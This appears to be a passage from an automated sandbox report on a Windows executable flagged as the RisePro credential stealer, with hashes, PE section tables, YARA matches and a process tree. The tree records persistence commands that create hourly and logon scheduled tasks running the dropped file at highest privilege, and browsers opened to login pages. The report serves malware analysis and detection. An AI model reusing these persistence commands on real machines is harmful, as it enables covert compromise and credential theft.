                                                                                                                                                                                  MD5:D101838E73B156A21EA1FD94EBCEEB1D
                                                                                                                                                                                  SHA1:C515B856E4AA0DE6FDAF13536873AFEB0D44D45B
                                                                                                                                                                                  SHA-256:01E64CF9DF1DBF2FB4BFA333E3B2838272081B0BD396AACF340A56FA9252E15D
                                                                                                                                                                                  SHA-512:A13AA569E36F3C68585965FDCC5B54454264E9EE7CB1BAE695EDF70F0716EA6D71D3E0060B39074BD1EA0E5AE9946B8A1CDF80E7A52BEE1DC8CF8E8E2FE79324
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSFwkbMnFS9SzlUhIFDYOoWz0SBQ3Fk8QkEhcJsA2cf48--pcSBQ14bxIZEgUNxZPEJBIQCXIJePU8PqV8EgUNvYWDDw==?alt=proto
                                                                                                                                                                                  Preview:CiIKEw2DqFs9GgQICRgBGgQIVhgCIAEKCw3Fk8QkGgQISxgCCiIKEw14bxIZGgQICRgBGgQIVhgCIAEKCw3Fk8QkGgQISxgCCg8KDQ29hYMPGgYIARABGAM=
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:C source, Unicode text, UTF-8 text, with very long lines (65533), with no line terminators
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):75995
                                                                                                                                                                                  Entropy (8bit):5.330233242624909
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:r1X8E9coqS/zCct2GhRPXE2IbD71SgUeW7vIUncTUDgNpD5qTqGUMIzA:N8+/zCct2GDPXE2IbD71SgUeW7vIUncs
                                                                                                                                                                                  MD5:77476E9F4544D16E10921CB9D56067F3
                                                                                                                                                                                  SHA1:22677D2DF42EEC873802245EC72BBD8B6896F324
                                                                                                                                                                                  SHA-256:FB9B509D020C4C45AD497DE7C4F7D1B22B4E7DC62339927FBF7E32E227932CB7
                                                                                                                                                                                  SHA-512:86778E76F67A995D3FD9E4A5A6EDE940F5929A50390D578BD12ABBEEEA8FD94C09C8566C831DD92BB6D13A18ED24CE014416693432DD132207F0972B052C3408
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://static.licdn.com/sc/h/727ucpfhmn0jolb3t2h3o5dkj
                                                                                                                                                                                  Preview:var _0x41e7=['platformKey','getNavigatorPlatform','productKey','product','productSubKey','productSub','vendor','vendorSubKey','getDoNotTrack','incognitoKey','RequestFileSystem','webkitRequestFileSystem','TEMPORARY','storage','estimate','quota','safariIncognito','localStorage','setItem','test','Firefox','open','onerror','onsuccess','indexedDB','PointerEvent','MSPointerEvent','IE\x20','match','join','replace','OPR','Opera','splice','canvasKey','isCanvasSupported','getCanvasFp','isWebGlSupported','getWebglFp','javascriptsKey','scripts','locationKey','hash','host','href','origin','signalsKey','getSignals','getAdBlock','getHasLiedLanguages','getHasLiedResolution','getHasLiedOs','hasMinFlashInstalled','fonts','swfPath','loadSwfAndDetectFonts','missing\x20options.fonts.swfPath','flash\x20not\x20installed','swf\x20object\x20not\x20loaded','jsFontsKey','monospace','serif','Andale\x20Mono','Arial','Arial\x20Hebrew','Arial\x20MT','Arial\x20Narrow','Arial\x20Rounded\x20MT\x20Bold','Arial\x20Unicod
                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Entropy (8bit):7.963129291166755
                                                                                                                                                                                  TrID:
                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                  File name:I2jCDr35mu.exe
                                                                                                                                                                                  File size:2'328'576 bytes
                                                                                                                                                                                  MD5:758c5213c3ffebe919633188f8c07747
                                                                                                                                                                                  SHA1:fa534e53d645f69d1c950d8ff17e11e877ca970b
                                                                                                                                                                                  SHA256:b50becdb79b109e85caa4f588343fdd7e96152f4e23f40ad213a0336118bc87b
                                                                                                                                                                                  SHA512:783cee4a35dab87271a126b8ae46f41e636ff9afeb2dc5620723fed828c4c72f991127ff7b8fd1de287cb8f63b825fe0ebeda7585b66acd1411b7050b2f1bda9
                                                                                                                                                                                  SSDEEP:49152:ov+pa5Mxg2VmKxuou1saUJ3iuL+y8g9Rdi8ZNaFwbdwUdUL:1pa5Mx9oKhaKdL+Lgo8ZoF0dw5L
                                                                                                                                                                                  TLSH:E4B53381F88175B1EC3B00B958BF4F136F2EC64691F44E79369E2348ADF36589069AB1
                                                                                                                                                                                  File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......C...............L.......L.......L.......H.G.....H.......H.......H...R...L.......L.......L.........................E.......-....
                                                                                                                                                                                  Icon Hash:b2b2b3b2e4e66638
                                                                                                                                                                                  Entrypoint:0x9a3000
                                                                                                                                                                                  Entrypoint Section:.taggant
                                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                  Time Stamp:0x65D4404E [Tue Feb 20 06:01:50 2024 UTC]
                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                  OS Version Major:6
                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                  File Version Major:6
                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                  Subsystem Version Major:6
                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                  Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                  Instruction
                                                                                                                                                                                  add byte ptr [eax], al
| Name | Virtual Address | Virtual Size | Is in Section |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x13b054 | 0x68 | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x137000 | 0x3168 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x13b1f8 | 0x8 | .idata |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
| | 0x1000 | 0x136000 | 0x8f000 | 4ce034d88730e6ad731d2bea04f7c0cc | False | 0.9993802584134616 | data | 7.98730344696013 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x137000 | 0x3168 | 0x1800 | 4e9d27655c390b18e6f57f196fbe580a | False | 0.9197591145833334 | data | 7.627914612238417 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0x13b000 | 0x1000 | 0x200 | 1e17ac6f9d72045027c75c82e74ad637 | False | 0.14453125 | data | 0.9942709484982628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| | 0x13c000 | 0x2c1000 | 0x200 | 2aa5c9ea79012f9982c77cb5d8b5baf7 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| awogigmw | 0x3fd000 | 0x1a5000 | 0x1a4400 | 88667f4cb8358d5af8303c7a37294116 | False | 0.9910564070865556 | data | 7.953507397861078 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| nkfwixkm | 0x5a2000 | 0x1000 | 0x600 | 3464ae5b7cd78aa5afa57b282f45e8ba | False | 0.5690104166666666 | data | 4.903298889295569 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .taggant | 0x5a3000 | 0x3000 | 0x2200 | 5b2d59f8e7293c82dd90c8a7e73181f5 | False | 0.08168658088235294 | DOS executable (COM) | 1.0717145610010668 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
| RT_ICON | 0x59e36c | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | Russian | Russia | 0.3333333333333333 |
| RT_ICON | 0x59e654 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | Russian | Russia | 0.5777027027027027 |
| RT_ICON | 0x59e77c | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Russian | Russia | 0.4165162454873646 |
| RT_ICON | 0x59f024 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Russian | Russia | 0.42991329479768786 |
| RT_ICON | 0x59f58c | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Russian | Russia | 0.5159474671669794 |
| RT_ICON | 0x5a0634 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Russian | Russia | 0.6338652482269503 |
| RT_GROUP_ICON | 0x5a0a9c | 0x5a | data | Russian | Russia | 0.7111111111111111 |
| RT_VERSION | 0x5a0af6 | 0x33c | data | Russian | Russia | 0.44806763285024154 |
| RT_MANIFEST | 0x5a0e32 | 0x2e6 | XML 1.0 document, ASCII text, with CRLF line terminators | | | 0.45417789757412397 |
| RT_MANIFEST | 0x5a1118 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727 |

| DLL | Import |
| kernel32.dll | lstrcpy |

| Language of compilation system | Country where language is spoken | Map |
| Russian | Russia | |
| English | United States | |

                                                                                                                                                                                  Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                  Start time:12:28:57
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  Imagebase:0x30000
                                                                                                                                                                                  File size:2'328'576 bytes
                                                                                                                                                                                  MD5 hash:758C5213C3FFEBE919633188F8C07747
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                  Start time:12:29:00
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
                                                                                                                                                                                  Imagebase:0xf00000
                                                                                                                                                                                  File size:187'904 bytes
                                                                                                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                  Start time:12:29:00
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                  Start time:12:29:00
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
                                                                                                                                                                                  Imagebase:0xf00000
                                                                                                                                                                                  File size:187'904 bytes
                                                                                                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                  Start time:12:29:00
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                  Start time:12:29:02
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  Imagebase:0x9f0000
                                                                                                                                                                                  File size:2'328'576 bytes
                                                                                                                                                                                  MD5 hash:758C5213C3FFEBE919633188F8C07747
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000006.00000003.2506172514.0000000001446000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000003.2506172514.0000000001422000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                  • Detection: 39%, ReversingLabs
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                  Start time:12:29:02
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  Imagebase:0x9f0000
                                                                                                                                                                                  File size:2'328'576 bytes
                                                                                                                                                                                  MD5 hash:758C5213C3FFEBE919633188F8C07747
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                  Start time:12:29:11
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
                                                                                                                                                                                  Imagebase:0x350000
                                                                                                                                                                                  File size:2'328'576 bytes
                                                                                                                                                                                  MD5 hash:758C5213C3FFEBE919633188F8C07747
                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                  • Detection: 39%, ReversingLabs
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                  Start time:12:29:19
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exe"
                                                                                                                                                                                  Imagebase:0x40000
                                                                                                                                                                                  File size:917'504 bytes
                                                                                                                                                                                  MD5 hash:CBE3CA8AEB654F541B59B3F97C0C9492
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                  Start time:12:29:19
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.youtube.com/
                                                                                                                                                                                  Imagebase:0x7ff684c40000
                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                  Start time:12:29:19
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.linkedin.com/login
                                                                                                                                                                                  Imagebase:0x7ff684c40000
                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                  Start time:12:29:20
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.facebook.com/video
                                                                                                                                                                                  Imagebase:0x7ff684c40000
                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:15
                                                                                                                                                                                  Start time:12:29:20
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
                                                                                                                                                                                  Imagebase:0x350000
                                                                                                                                                                                  File size:2'328'576 bytes
                                                                                                                                                                                  MD5 hash:758C5213C3FFEBE919633188F8C07747
                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:17
                                                                                                                                                                                  Start time:12:29:20
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=2060,i,8917249356731724764,4060394153306559308,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                  Imagebase:0x7ff684c40000
                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:18
                                                                                                                                                                                  Start time:12:29:20
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1912 --field-trial-handle=1968,i,14158324147676388731,1062553766962202569,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                  Imagebase:0x7ff684c40000
                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:19
                                                                                                                                                                                  Start time:12:29:21
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1960,i,9119518786017765982,11408166405058387419,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                  Imagebase:0x7ff684c40000
                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:20
                                                                                                                                                                                  Start time:12:29:21
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://accounts.google.com/
                                                                                                                                                                                  Imagebase:0x7ff684c40000
                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:21
                                                                                                                                                                                  Start time:12:29:22
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1976,i,16814294900655359073,9593979145222890954,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                  Imagebase:0x7ff684c40000
                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:22
                                                                                                                                                                                  Start time:12:29:22
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.youtube.com
                                                                                                                                                                                  Imagebase:0x7ff715da0000
                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                  MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:23
                                                                                                                                                                                  Start time:12:29:22
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.facebook.com/video
                                                                                                                                                                                  Imagebase:0x7ff715da0000
                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                  MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:24
                                                                                                                                                                                  Start time:12:29:23
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://accounts.google.com
                                                                                                                                                                                  Imagebase:0x7ff715da0000
                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                  MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:25
                                                                                                                                                                                  Start time:12:29:23
                                                                                                                                                                                  Start date:21/02/2024
